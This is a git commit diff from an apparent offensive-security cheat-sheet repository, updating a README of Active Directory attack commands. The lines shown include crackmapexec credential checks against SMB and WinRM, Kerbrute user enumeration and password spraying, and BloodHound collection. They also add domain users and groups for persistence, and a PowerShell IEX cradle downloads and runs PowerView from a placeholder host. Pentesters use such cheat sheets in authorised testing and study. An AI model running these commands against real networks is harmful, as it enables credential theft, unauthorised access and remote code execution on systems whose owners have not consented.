kqjy/Offensive-Security-Cheat-Sheet
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Update README.md

Browse Source
This commit is contained in:
Joe Totes
2022-09-06 20:32:18 -04:00
committed by GitHub
parent 15bc454d31
commit 17ac566b37
1 changed files with 9 additions and 7 deletions
Download Patch File Download Diff File Expand all files Collapse all files

16
README.md
View File

@@ -513,6 +513,9 @@ crackmapexec smb {IP ADDRESS} -u {USER.txt} -p {PASSWORDS.txt} --shares --contin
crackmapexec smb {IP ADDRESS} --pass-pol crackmapexec smb {IP ADDRESS} --pass-pol
crackmapexec smb {IP ADDRESS} --pass-pol -u '' -p '' crackmapexec smb {IP ADDRESS} --pass-pol -u '' -p ''
# Winrm credential check
crackmapexec winrm {IP ADDRESS} -u '{USER}' -p '{PASSWORD}'
# Mount SMB Drive # Mount SMB Drive
sudo mount -t cifs //{IP ADDRESS}/{SHARE} /mnt/{SHARE}/ sudo mount -t cifs //{IP ADDRESS}/{SHARE} /mnt/{SHARE}/
sudo mount -t cifs -o 'username={USERNAME},password={PASSWORD}' //{IP ADDRESS}/{SHARE} /mnt/{SHARE}/ sudo mount -t cifs -o 'username={USERNAME},password={PASSWORD}' //{IP ADDRESS}/{SHARE} /mnt/{SHARE}/
@@ -627,6 +630,12 @@ net user {USERNAME} /domain
# Enumerate all groups in domain # Enumerate all groups in domain
net group /domain net group /domain
# Add user
net user {USERNAME} {PASSWORD} /add /domain
# Add user to group
net group "{GROUP}" {USERNAME} /add
# Kerbrute Brute Force # Kerbrute Brute Force
sudo /opt/kerbrute/kerbrute userenum -d {DOMAIN} --dc {IP ADDRESS} {user.txt} sudo /opt/kerbrute/kerbrute userenum -d {DOMAIN} --dc {IP ADDRESS} {user.txt}
sudo /opt/kerbrute/kerbrute passwordspray -d {DOMAIN} --dc {IP ADDRESS} {user.txt} {passwords.txt} sudo /opt/kerbrute/kerbrute passwordspray -d {DOMAIN} --dc {IP ADDRESS} {user.txt} {passwords.txt}
@@ -655,13 +664,6 @@ SharpHound.exe -c all # RHOST
# Bloodhound python remote access # Bloodhound python remote access
sudo python3 /opt/BloodHound.py/bloodhound.py -u '{USERNAME}' -p '{PASSWORD}' -ns {IP ADDRESS} -d {DOMAIN} -c all sudo python3 /opt/BloodHound.py/bloodhound.py -u '{USERNAME}' -p '{PASSWORD}' -ns {IP ADDRESS} -d {DOMAIN} -c all
# Add user
net user {USERNAME} {PASSWORD} /add /domain
# Add user to group
net group "{GROUP}" {USERNAME} /add
# Powerview example # Powerview example
IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1") IEX(New-Object Net.WebClient).downloadstring("http://{IP ADDRESS}/PowerView.ps1")
$pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force $pass = convertto-securestring '{PASSWORD}' -AsPlainText -Force